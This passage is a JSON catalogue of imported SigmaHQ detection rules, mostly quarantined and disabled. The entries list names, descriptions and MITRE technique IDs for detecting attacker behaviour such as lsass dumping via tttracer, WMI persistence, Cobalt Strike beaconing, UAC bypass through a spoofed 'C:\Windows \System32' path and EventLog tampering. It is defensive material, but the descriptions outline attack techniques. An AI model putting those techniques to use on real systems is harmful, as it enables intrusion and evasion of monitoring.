"SigmaHQ/sigma", "source_id": "0b0cd537-fc77-4e6e-a973-e53495c1083d", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_renamed_office_processes.yml" } }, { "id": "sigmahq-sigma-0b0ea3cc-99c8-4730-9c53-45deee2a4c86", "type": "detection", "name": "Microsoft Defender Blocked from Loading Unsigned DLL", "description": "Detects Code Integrity (CI) engine blocking Microsoft Defender's processes (MpCmdRun and NisSrv) from loading unsigned DLLs which may be an attempt to sideload arbitrary DLL", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1574.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/microsoft-defender-blocked-from-loading-unsigned-dll.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "0b0ea3cc-99c8-4730-9c53-45deee2a4c86", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/security_mitigations/win_security_mitigations_defender_load_unsigned_dll.yml" } }, { "id": "sigmahq-sigma-0b4ae027-2a2d-4b93-8c7e-962caaba5b2a", "type": "detection", "name": "Time Travel Debugging Utility Usage", "description": "Detects usage of Time Travel Debugging Utility. Adversaries can execute malicious processes and dump processes, such as lsass.exe, via tttracer.exe.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1218", "T1003.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/time-travel-debugging-utility-usage.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "0b4ae027-2a2d-4b93-8c7e-962caaba5b2a", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_lolbin_tttracer_mod_load.yml" } }, { "id": "sigmahq-sigma-0b4b72e3-4c53-4d5b-b198-2c58cfef39a9", "type": "detection", "name": "Guest User Invited By Non Approved Inviters", "description": "Detects when a user that doesn't have permissions to invite a guest user attempts to invite one.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1078.004" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/guest-user-invited-by-non-approved-inviters.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "0b4b72e3-4c53-4d5b-b198-2c58cfef39a9", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/azure/audit_logs/azure_guest_invite_failure.yml" } }, { "id": "sigmahq-sigma-0b7163dc-7eee-4960-af17-c0cd517f92da", "type": "detection", "name": "Service Started/Stopped Via Wmic.EXE", "description": "Detects usage of wmic to start or stop a service", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1047" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/service-started-stopped-via-wmic-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "0b7163dc-7eee-4960-af17-c0cd517f92da", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_wmic_service_manipulation.yml" } }, { "id": "sigmahq-sigma-0b7889b4-5577-4521-a60a-3376ee7f9f7b", "type": "detection", "name": "WMI Persistence", "description": "Detects suspicious WMI event filter and command line event consumer based on WMI and Security Logs.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1546.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/wmi-persistence.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "0b7889b4-5577-4521-a60a-3376ee7f9f7b", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/wmi/win_wmi_persistence.yml" } }, { "id": "sigmahq-sigma-0b80ade5-6997-4b1d-99a1-71701778ea61", "type": "detection", "name": "Imports Registry Key From an ADS", "description": "Detects the import of a alternate datastream to the registry with regedit.exe.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1112" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/imports-registry-key-from-an-ads.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "0b80ade5-6997-4b1d-99a1-71701778ea61", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_regedit_import_keys_ads.yml" } }, { "id": "sigmahq-sigma-0b8baa3f-575c-46ee-8715-d6f28cc7d33c", "type": "detection", "name": "NTDS.DIT Created", "description": "Detects creation of a file named \"ntds.dit\" (Active Directory Database)", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1003.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/ntds-dit-created.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "0b8baa3f-575c-46ee-8715-d6f28cc7d33c", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_event/file_event_win_ntds_dit_creation.yml" } }, { "id": "sigmahq-sigma-0b9ad457-2554-44c1-82c2-d56a99c42377", "type": "detection", "name": "Anydesk Temporary Artefact", "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1219.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/anydesk-temporary-artefact.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "0b9ad457-2554-44c1-82c2-d56a99c42377", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_event/file_event_win_anydesk_artefact.yml" } }, { "id": "sigmahq-sigma-0ba1da6d-b6ce-4366-828c-18826c9de23e", "type": "detection", "name": "Potential Defense Evasion Via Rename Of Highly Relevant Binaries", "description": "Detects the execution of a renamed binary often used by attackers or malware leveraging new Sysmon OriginalFileName datapoint.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1036.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-defense-evasion-via-rename-of-highly-relevant-binaries.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "0ba1da6d-b6ce-4366-828c-18826c9de23e", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_renamed_binary_highly_relevant.yml" } }, { "id": "sigmahq-sigma-0ba863e6-def5-4e50-9cea-4dd8c7dc46a4", "type": "detection", "name": "Control Panel Items", "description": "Detects the malicious use of a control panel item", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1218.002", "T1546" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/control-panel-items.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "0ba863e6-def5-4e50-9cea-4dd8c7dc46a4", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_control_panel_item.yml" } }, { "id": "sigmahq-sigma-0badd08f-c6a3-4630-90d3-6875cca440be", "type": "detection", "name": "User Logoff Event", "description": "Detects a user log-off activity. Could be used for example to correlate information during forensic investigations", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1531" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/user-logoff-event.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "0badd08f-c6a3-4630-90d3-6875cca440be", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/security/win_security_user_logoff.yml" } }, { "id": "sigmahq-sigma-0bb4bbeb-fe52-4044-b40c-430a04577ebe", "type": "detection", "name": "Potentially Suspicious File Download From ZIP TLD", "description": "Detects the download of a file with a potentially suspicious extension from a .zip top level domain.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potentially-suspicious-file-download-from-zip-tld.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "0bb4bbeb-fe52-4044-b40c-430a04577ebe", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/create_stream_hash/create_stream_hash_zip_tld_download.yml" } }, { "id": "sigmahq-sigma-0bbc6369-43e3-453d-9944-cae58821c173", "type": "detection", "name": "Execution via WorkFolders.exe", "description": "Detects using WorkFolders.exe to execute an arbitrary control.exe", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1218" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/execution-via-workfolders-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "0bbc6369-43e3-453d-9944-cae58821c173", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_susp_workfolders.yml" } }, { "id": "sigmahq-sigma-0bcfabcb-7929-47f4-93d6-b33fb67d34d1", "type": "detection", "name": "Adwind RAT / JRAT File Artifact", "description": "Detects javaw.exe in AppData folder as used by Adwind / JRAT", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1059.005", "T1059.007" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/adwind-rat-jrat-file-artifact.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "0bcfabcb-7929-47f4-93d6-b33fb67d34d1", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_event/file_event_win_mal_adwind.yml" } }, { "id": "sigmahq-sigma-0c3fac91-5627-46e8-a6a8-a0d7b9b8ae1b", "type": "detection", "name": "Suspicious Get-Variable.exe Creation", "description": "Get-Variable is a valid PowerShell cmdlet\nWindowsApps is by default in the path where PowerShell is executed.\nSo when the Get-Variable command is issued on PowerShell execution, the system first looks for the Get-Variable executable in the path and executes the malicious binary instead of looking for the PowerShell cmdlet.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1546", "T1027" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-get-variable-exe-creation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "0c3fac91-5627-46e8-a6a8-a0d7b9b8ae1b", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_event/file_event_win_susp_get_variable.yml" } }, { "id": "sigmahq-sigma-0c46d4f4-a2bf-4104-9597-8d653fc2bb55", "type": "detection", "name": "GitHub Repository Pages Site Changed to Public", "description": "Detects when a GitHub Pages site of a repository is made public. This usually is part of a publishing process but could indicate or lead to potential unauthorized exposure of sensitive information or code.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1567.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/github-repository-pages-site-changed-to-public.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "0c46d4f4-a2bf-4104-9597-8d653fc2bb55", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/application/github/audit/github_pages_site_changed_to_public.yml" } }, { "id": "sigmahq-sigma-0c718a5e-4284-4fb9-b4d9-b9a50b3a1974", "type": "detection", "name": "Invoke-Obfuscation STDIN+ Launcher - Security", "description": "Detects Obfuscated use of stdin to execute PowerShell", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1027", "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/invoke-obfuscation-stdin-launcher-security.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "0c718a5e-4284-4fb9-b4d9-b9a50b3a1974", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/security/win_security_invoke_obfuscation_stdin_services_security.yml" } }, { "id": "sigmahq-sigma-0c92f2e6-f08f-4b73-9216-ecb0ca634689", "type": "detection", "name": "PUA - Potential PE Metadata Tamper Using Rcedit", "description": "Detects the use of rcedit to potentially alter executable PE metadata properties, which could conceal efforts to rename system utilities for defense evasion.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1036.003", "T1036", "T1027.005", "T1027" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/pua-potential-pe-metadata-tamper-using-rcedit.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "0c92f2e6-f08f-4b73-9216-ecb0ca634689", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_pua_rcedit_execution.yml" } }, { "id": "sigmahq-sigma-0c93308a-3f1b-40a9-b649-57ea1a1c1d63", "type": "detection", "name": "Activate Suppression of Windows Security Center Notifications", "description": "Detect set Notification_Suppress to 1 to disable the Windows security center notification", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1112" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/activate-suppression-of-windows-security-center-notifications.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "0c93308a-3f1b-40a9-b649-57ea1a1c1d63", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_suppress_defender_notifications.yml" } }, { "id": "sigmahq-sigma-0c97c1d3-4057-45c9-b148-1de94b631931", "type": "detection", "name": "Okta Policy Rule Modified or Deleted", "description": "Detects when an Policy Rule is Modified or Deleted.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.identity" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/okta-policy-rule-modified-or-deleted.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "0c97c1d3-4057-45c9-b148-1de94b631931", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/identity/okta/okta_policy_rule_modified_or_deleted.yml" } }, { "id": "sigmahq-sigma-0c9b3bda-41a6-4442-9345-356ae86343dc", "type": "detection", "name": "Kubernetes CronJob/Job Modification", "description": "Detects when a Kubernetes CronJob or Job is created or modified.\nA Kubernetes Job creates one or more pods to accomplish a specific task, and a CronJob creates Jobs on a recurring schedule.\nAn adversary can take advantage of this Kubernetes object to schedule Jobs to run containers that execute malicious code within a cluster, allowing them to achieve persistence.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/kubernetes-cronjob-job-modification.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "0c9b3bda-41a6-4442-9345-356ae86343dc", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/application/kubernetes/audit/kubernetes_audit_cronjob_modification.yml" } }, { "id": "sigmahq-sigma-0cb8d736-995d-4ce7-a31e-1e8d452a1459", "type": "detection", "name": "Potential EventLog File Location Tampering", "description": "Detects tampering with EventLog service \"file\" key. In order to change the default location of an Evtx file. This technique is used to tamper with log collection and alerting", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1685.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-eventlog-file-location-tampering.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "0cb8d736-995d-4ce7-a31e-1e8d452a1459", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_evtx_file_key_tamper.yml" } }, { "id": "sigmahq-sigma-0cbe38c0-270c-41d9-ab79-6e5a9a669290", "type": "detection", "name": "Trusted Path Bypass via Windows Directory Spoofing", "description": "Detects DLLs loading from a spoofed Windows directory path with an extra space (e.g \"C:\\Windows \\System32\") which can bypass Windows trusted path verification.\nThis technique tricks Windows into treating the path as trusted, allowing malicious DLLs to load with high integrity privileges bypassing UAC.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1574.007", "T1548.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/trusted-path-bypass-via-windows-directory-spoofing.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "0cbe38c0-270c-41d9-ab79-6e5a9a669290", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/image_load/image_load_win_trusted_path_bypass.yml" } }, { "id": "sigmahq-sigma-0cf2e1c6-8d10-4273-8059-738778f981ad", "type": "detection", "name": "Potential WerFault ReflectDebugger Registry Value Abuse", "description": "Detects potential WerFault \"ReflectDebugger\" registry value abuse for persistence.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1036.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-werfault-reflectdebugger-registry-value-abuse.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "0cf2e1c6-8d10-4273-8059-738778f981ad", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_persistence_reflectdebugger.yml" } }, { "id": "sigmahq-sigma-0cf7a157-8879-41a2-8f55-388dd23746b7", "type": "detection", "name": "Linux Recon Indicators", "description": "Detects events with patterns found in commands used for reconnaissance on linux systems", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1592.004", "T1552.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/linux-recon-indicators.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "0cf7a157-8879-41a2-8f55-388dd23746b7", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/process_creation/proc_creation_lnx_susp_recon_indicators.yml" } }, { "id": "sigmahq-sigma-0d18728b-f5bf-4381-9dcf-915539fff6c2", "type": "detection", "name": "Suspicious Cobalt Strike DNS Beaconing - DNS Client", "description": "Detects a program that invoked suspicious DNS queries known from Cobalt Strike beacons", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "critical", "category": "_quarantine", "mitre_techniques": [ "T1071.004" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-cobalt-strike-dns-beaconing-dns-client.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "0d18728b-f5bf-4381-9dcf-915539fff6c2", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/dns_client/win_dns_client_mal_cobaltstrike.yml" } }, { "id": "sigmahq-sigma-0d2c3d4c-4b48-4ac3-8f23-ea845746bb1a", "type": "detection", "name": "Ruby on Rails Framework Exceptions", "description": "Detects suspicious Ruby on Rails exceptions that could indicate exploitation attempts", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1190" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": true, "path": "detections/sigma-imports/endpoint/ruby-on-rails-framework-exceptions.yaml", "provenance": { "source": "SigmaHQ/sigma", "source_id": "0d2c3d4c-4b48-4ac3-8f23-ea845746bb1a", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/application/ruby/appframework_ruby_on_rails_exceptions.yml" } }, { "id": "sigmahq-sigma-0d34ed8b-1c12-4ff2-828c-16fc860b766d", "type": "detection", "name": "Suspicious Processes Spawned by Java.EXE", "description": "Detects suspicious processes spawned from a Java host process which could indicate a sign of exploitation (e.g. log4j)", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-processes-spawned-by-java-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "0d34ed8b-1c12-4ff2-828c-16fc860b766d", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_java_susp_child_process.yml" } }, { "id": "sigmahq-sigma-0d5675be-bc88-4172-86d3-1e96a4476536", "type": "detection", "name": "Potential Tampering With RDP Related Registry Keys Via Reg.EXE", "description": "Detects the execution of \"reg.exe\" for enabling/disabling the RDP service on the host by tampering with the 'CurrentControlSet\\Control\\Terminal Server' values", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1021.001", "T1112" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-tampering-with-rdp-related-registry-keys-via-reg-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "0d5675be-bc88-4172-86d3-1e96a4476536", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_reg_rdp_keys_tamper.yml" } }, { "id": "sigmahq-sigma-0d7a9363-af70-4e7b-a3b7-1a176b7fbe84", "type": "detection", "name": "Exports Registry Key To an Alternate Data Stream", "description": "Exports the target Registry key and hides it in the specified alternate data stream.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1564.004" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/exports-registry-key-to-an-alternate-data-stream.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "0d7a9363-af70-4e7b-a3b7-1a176b7fbe84", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/create_stream_hash/create_stream_hash_regedit_export_to_ads.yml" } }, { "id": "sigmahq-sigma-0d7ceeef-3539-4392-8953-3dc664912714", "type": "detection", "name": "UAC Secure Desktop Prompt Disabled", "description": "Detects when an attacker tries to change User Account Control (UAC) elevation request destination 